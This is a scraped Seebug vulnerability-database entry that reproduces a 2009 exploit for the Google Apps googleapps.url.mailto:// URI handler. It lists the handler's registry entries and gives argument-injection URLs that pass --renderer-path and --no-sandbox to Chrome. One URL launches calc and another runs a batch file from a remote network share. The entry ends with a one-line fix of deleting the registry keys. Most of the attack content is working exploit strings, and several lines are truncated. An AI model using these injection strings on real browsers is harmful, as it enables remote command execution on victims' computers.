google apps googleapps.url.mailto:// uri handler cross-browser

ID SSV:12417
Type seebug
Reporter Root
Modified 2009-10-03T00:00:00


No description provided by source.

                                                google apps googleapps.url.mailto:// uri handler cross-browser remote command \
execution exploit (Internet Explorer) by nine:situations:group::pyrokinesis

software site:

tested against: Internet Explorer 8, windows xp sp3
                Internet Explorer 7, windows xp sp3
                Google Chrome

through the vulnerable googleapps.url.mailto:// deprecated uri handler, registered as \

@="Google Apps URL"
"FriendlyTypeName"="Google Apps URL"
"URL Protocol"=""

@="C:\\Programmi\\Google\\Google Apps\\googleapps.exe,0"



@="C:\\Programmi\\Google\\Google Apps\\googleapps.exe\"%1\""

is possibile, against all versions of Internet Explorer, by injecting the "--domain=" \
switch for the googleapps.exe executable to pass arbitrary switches to the Google \
Chrome chrome.exe executable (which is subsequently launched to open the gmail \
example: the --renderer-path and --no-sandbox switches
Through them is possible to launch an arbitrary executable from the local system:

googleapps.url.mailto://"%20--domain="--what%20--renderer-path=calc%20--no-sandbox%20- \

or to launch an arbitrary batch file from a remote network share:

googleapps.url.mailto://"%20--domain="--x%20--renderer-path=\\\uncshare\sh. \

the resulting command line for chrome.exe is in this case:

"C:\Programmi\Google\Chrome\Application\chrome.exe" \
--app= --renderer-path=\\\uncshare\sh.bat \


which leverages the remote command execution issue


unregister the uri handler by deleting the mentioned registry keys

original url: